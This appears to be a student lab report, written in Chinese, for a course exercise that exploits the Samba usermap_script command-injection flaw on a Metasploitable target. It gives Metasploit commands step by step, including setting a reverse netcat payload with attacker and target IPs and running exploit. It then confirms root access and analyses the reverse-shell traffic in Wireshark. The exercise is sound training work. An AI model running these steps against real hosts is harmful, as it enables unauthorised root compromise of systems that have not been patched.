《网络攻防实践》实验七报告
一、实验名称
Linux 远程渗透攻击与攻防对抗实践
二、实验目的
- 掌握 Metasploit 渗透测试框架的基本使用方法。
- 利用 Samba 服务
usermap_script漏洞对 Metasploitable Linux 靶机实施远程渗透攻击。 - 成功获取目标主机远程 Shell 并获得 root 权限。
- 使用 Wireshark 捕获攻击流量,分析攻击全过程,理解漏洞利用原理。
三、实验环境
- 攻击机:Kali Linux(IP:192.168.200.6)
- 靶机:Metasploitable Ubuntu(IP:192.168.200.25)
- 网络模式:VMware 仅主机/ NAT 模式,双向互通
- 工具:Metasploit Framework、Wireshark
四、实验原理
1. 漏洞简介
Samba 是 Linux/Unix 上实现 SMB 协议的开源软件,用于文件与打印共享。
usermap_script 漏洞属于命令注入漏洞,攻击者可构造恶意用户名,远程执行任意系统命令,直接获取 root 权限。
2. 攻击流程
- 启动 Metasploit,加载漏洞利用模块
- 配置攻击载荷(Payload)
- 设置靶机 IP(RHOST)与攻击机本地 IP(LHOST)
- 发起攻击,获取反弹 Shell
- 执行系统命令,验证权限并进行流量分析
五、实验步骤
(一)查看ip地址
-
kali:
![image]()
-
Metasploitable Ubuntu:
![image]()
(二)连通性测试
在 Kali 中 ping 靶机:
ping 192.168.200.25

(三)Metasploit 渗透攻击
- 启动 Metasploit:
msfconsole

- 查找usermap_script安全漏洞,使用它并查看与该渗透攻击模块相兼容的攻击载荷。
search usermap_script
use 0
show payloads

3.本次实践已经给出要使用的攻击模块为samba服务,因此输入以下指令。
search samba

- 设置攻击载荷:
set payload cmd/unix/reverse_netcat

- 配置关键参数:
set LHOST 192.168.200.6 # 攻击机IP
set RHOST 192.168.200.25 # 靶机IP
- 发起攻击:
exploit

(四)获取 Shell 与权限验证
攻击成功后获得会话,执行以下命令:
- 查看当前 IP(靶机信息):
ifconfig

- 查看当前用户权限:
id
whoami
返回 uid=0(root),说明已获取root 最高权限。

- 执行系统操作验证:
uname -a
cd /home
mkdir attack_verify
echo "samba_attack_success" > attack_log.txt
ls

(五)流量捕获与分析
- 攻击前启动 Wireshark,选择网卡开始抓包。
- 攻击完成后停止抓包,使用过滤器:
ip.addr == 192.168.200.6 && ip.addr == 192.168.200.25

3.会话建立阶段(No. 2-4):攻击机向靶机 139 端口发起 TCP 三次握手,建立 FTP 控制会话;

- 找到 SMB/TCP 数据包,右键 → 追踪 TCP 流。可看到:
- 攻击机向靶机 139 端口发起连接
- SMB 协商过程
- 恶意命令注入过程
- 反弹 4444 端口建立 Shell 会话
![image]()
5.这张图是攻击机向靶机发送的恶意命令流。可以看到 Metasploit 自动生成了多段注入指令,包括随机字符串校验、系统命令探测和 Python 反弹 Shell 代码,这些指令通过 Samba 漏洞注入,是攻击载荷执行的关键过程。

6.这张图是靶机对攻击命令的响应流。可以看到靶机成功执行了攻击机发送的echo命令并返回结果,同时输出了连接尝试的错误日志,证明命令注入已成功,靶机正在执行攻击载荷并尝试建立反弹会话。

六、实验结果
- 成功利用 Samba
usermap_script漏洞获取靶机 root 权限。 - 成功在靶机创建文件、执行系统指令,控制目标主机。
- 完整捕获攻击流量,清晰分析出攻击流程、漏洞利用方式与命令执行过程。
七、问题与解决方法
- 问题:设置 IP 后无法 ping 通。
- 解决:检查虚拟机网段,确保攻击机与靶机在同一子网;正确配置网关与子网掩码。
- 问题:exploit 执行失败,无法建立会话。
- 解决:确认 LHOST 为本机正确 IP;关闭防火墙;重新启动模块与靶机服务。
- 问题:Wireshark 抓包杂乱,难以定位攻击流量。
- 解决:使用 IP 地址过滤,只保留攻击机与靶机之间的流量。
八、实验总结
本次网络攻防实践实验中,我通过搭建Kali攻击机与Metasploitable靶机的实验环境,成功完成了基于Samba usermap_script漏洞的远程渗透攻击实践,掌握了Metasploit框架的模块加载、参数配置与漏洞利用流程,验证了静态IP配置、连通性测试、流量捕获分析等关键步骤,直观理解了命令注入漏洞的利用原理与反弹Shell的建立过程;实验让我深刻认识到未修补高危漏洞对系统安全的严重威胁,也提升了渗透测试与流量分析的实践能力,为后续网络攻防学习奠定了扎实基础。
实验表明,未修补的高危漏洞可使攻击者轻易获取系统最高权限,危害极大。在实际防护中应及时更新补丁、关闭无用服务、配置防火墙并开启日志审计。




浙公网安备 33010602011771号